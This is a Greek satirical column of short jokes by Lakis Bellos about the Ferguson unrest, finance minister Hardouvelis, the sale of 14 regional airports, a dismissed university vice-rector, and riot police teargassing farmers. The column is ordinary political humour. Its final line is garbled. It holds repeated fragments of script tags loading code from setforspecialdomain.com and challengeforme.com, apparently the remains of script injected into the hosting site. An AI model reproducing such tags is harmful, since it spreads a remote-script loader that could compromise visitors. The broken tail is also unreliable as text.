Σηκώθηκαν από τους καναπέδες στην Αμερική…Λάκης Μπέλλος

♦Σηκώθηκαν από τους καναπέδες οι Αμερικανοί στο Μιζούρι. Χαμός στο Φέργκιουσον αλλά και σε Νέα Υόρκη, Ουάσινγκτον, Λος Αντζελες, Βοστόνη. Η εξέγερση επεκτάθηκε μέχρι τη Φιλαδέλφεια.

♦Οχι στη Νέα Φιλαδέλφεια, γιατί εξέγερση εκεί θα γίνει αν δεν χτιστεί το γήπεδο.

♦Σε κάποιες άλλες χώρες, όχι, δεν σηκώνονται από τον καναπέ, αλλά τώρα που ήρθε η ανάπτυξη αγοράζουν κι άλλον. Εχουμε τους περισσότερους καναπέδες ανά τετραγωνικό μέτρο στον κόσμο.

♦Δεν υπάρχουν μόνο μούντζες στο Μιζούρι. Κόλαση. Κάλεσε όμως ο Ομπάμα Ελληνες παρουσιαστές-σχολιογράφους να αποδυναμώσουν και εν τέλει να ξεφτιλίσουν τους εκεί αγανακτισμένους-εξαγριωμένους.

♦Ο Γούντι Αλεν θα κάνει νέο έργο -με το πρόγραμμα των επισκέψεών μας στην τρόικα- «Χαρδούβελης, Παρίσι, Βαρκελώνη».

♦Τον Χαρδούβελη τον φτύνουμε εδώ. Στο Παρίσι, όμως, όλοι οι τουρίστες ήθελαν να βγάλουν σέλφι μαζί του, με τον υπουργό Οικονομικών της πιο χρεωμένης χώρας στον κόσμο.

♦Ο Χαρδούβελης έκανε ρομαντική βόλτα στον Σηκουάνα και τραγουδούσε Εντίθ Πιαφ: «Παρά μ’, παρά μ’, παρά μ’».

♦Ελλάδα, τι να πεις… Αντί να τιμήσουν τον αντιπρύτανη του ΑΠΘ που σκέφτηκε μία απίθανη καινούργια φράση, τη «φασιστοποίηση της εξουσίας», τον απέλυσαν κιόλας. Δηλαδή, τον Μπαμπινιώτη πρέπει να τον κρεμάσουμε;

♦Είχε κι άλλες λέξεις έτοιμες, π.χ. χρυσαυγοποίηση, κασιδιαροποίηση, τανκοποίηση, χουντοποίηση… Ποίηση σκέτη ο αντιπρύτανης.

♦Πολύ καλό αυτό που έκαναν οι φοιτητές, που έριξαν σκουπίδια πάνω στο γραφείο άλλου αντιπρύτανη. Μου έδωσαν ιδέα. Οταν μαζεύονται πολλά σκουπίδια τούς τηλεφωνώ κι έρχονται, τα παίρνουν και τα πετάνε.

♦Φοβερή καθαριότητα στα Πανεπιστήμια. Εχουν να καθαριστούν εδώ και 5 καταλήψεις.

♦Πάνε 14 αεροδρόμια. Πουλήθηκαν και πανηγυρίζει το ΤΑΙΠΕΔ για την «προσφορά-έκπληξη» των 1.234 δισ. για τα αεροδρόμια σε Θεσσαλονίκη, Κέρκυρα, Χανιά, Κεφαλονιά, Ζάκυνθο, Ακτιο, Καβάλα, Ρόδο, Κω, Σάμο, Μυτιλήνη, Σαντορίνη, Σκιάθο και φυσικά Μύκονοοοοοοο!

♦Το τίμημα δεν μου φαίνεται τόσο έκπληξη και για πανηγυρισμούς. Εναν καλοκαιρινό μήνα δρομολόγια και βγήκε. Να τα χαίρεστε, κύριε Κοπελούζο!

♦Προτάσεις της στήλης στον ΣΥΡΙζΑ μετά τη μεταγραφή Τζάκρη για να εκτοξευθεί ακόμα περισσότερο:

• Μάκης Γιακουμάτος

• Ραχήλ Μακρή

• Πάρις Κουκουλόπουλος

• Αντζελα Γκερέκου

♦Χημικά και στους κτηνοτρόφους έριξαν τα ΜΑΤ. Ετσι, για να μη μείνει παραπονεμένη καμιά τάξη.

♦Οι κρότου-λάμψης, πάντως, δεν έκαναν τίποτα γιατί τον θόρυβό τους κάλυπτε ο θόρυβος από τις κουδούνες.

♦Οι κτηνοτρόφοι φώναζαν στα ΜΑΤ να μην ξύνονται στην γκλίτσα του τσοπάνη και οι ΜΑΤατζήδες τούς φώναζαν να μην ξύνονται στο κλομπ.

♦Αυτή τη στάνη έχουμε, αυτά τα ΜΑΤ βγάζουμε.

♦Απαράδεκτος ο έλεγχος εισιτηρίων στα ΜΜΜ από σεκιουριτάδες. Πρέπει να γίνεται από τα ΜΑΤ.

♦Πολλά έγραψα. Πάω να κοιτάξω για κάναν καναπέ.

♦Στην Ελλάδα δεν νοιαζόμαστε αν θα μας κατασχέσουν το σπίτι, αλλά τον καναπέ. Και μετά καθόμαστε και μιζουριάζουμε.

♦Ελληνες είπαμε. Είναι χαρακτηριστικό ότι η πιο ήσυχη περιοχή των ΗΠΑ στις ταραχές είναι η Αστόρια.

♦Σε μερικά πράγματα, πάντως, είμαστε πολύ μπροστά. Στο Φέργκιουσον ήταν χθες με τα φοβερά γεγονότα όλοι κι όλοι 4.000 αστυνομικοί. Εδώ μαζεύουμε 7.000 αστυνομικούς, έτσι για πλάκα.

efsyn.gr___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >